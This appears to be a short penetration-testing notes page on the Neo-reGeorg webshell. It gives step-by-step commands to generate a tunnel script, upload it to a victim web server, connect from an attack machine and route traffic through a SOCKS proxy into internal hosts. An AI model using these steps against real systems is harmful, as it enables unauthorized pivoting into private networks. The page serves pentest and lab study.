search
githubEdit

Neo-reGeorg Webshell

  • Neo-reGeorg is unlike other webshells where it will not yield you command execution on a host natively. However, if you are able to establish a neo-regeorg on a host in the first place you already have access to it.

  • Neo-reGeorg allows you to compromise a web server (typically public facing) and to tunnel through it to other internal only hosts in the network. This is called HTTP Tunneling.

hashtag
HTTP Tunneling

  • For HTTP Tunneling, we will be using a Neo-reGeorgarrow-up-right tool to establish a communication channel to access the internal network devices.

  • Generate an encrypted client file to upload it to the victim web server

python3 neoreg.py generate -k my_key

  • -k is the key for the file so in the real world make it strong

  • The previous command generates encrypted Tunneling clients with my_key key in the neoreg_servers/ directory. Note that there are various extensions available, including PHP, ASPX, JSP, etc.

  • We will be using tunnel.php

  • Upload the tunnel.php file to the victim web server

  • Now let's connect to the neo from our attack machine that we just uploaded

python3 neoreg.py -k my_key -u http://MACHINE_IP/uploader/files/tunnel.php

  • Once you connect, we are ready to use the tunnel connection as a proxy on our local machine 127.0.0.1:1080

  • Now we can tunnel further into the network

  • To curl with socks, run the below command

curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
PreviousAspx WebshellNextcurlshell

Last updated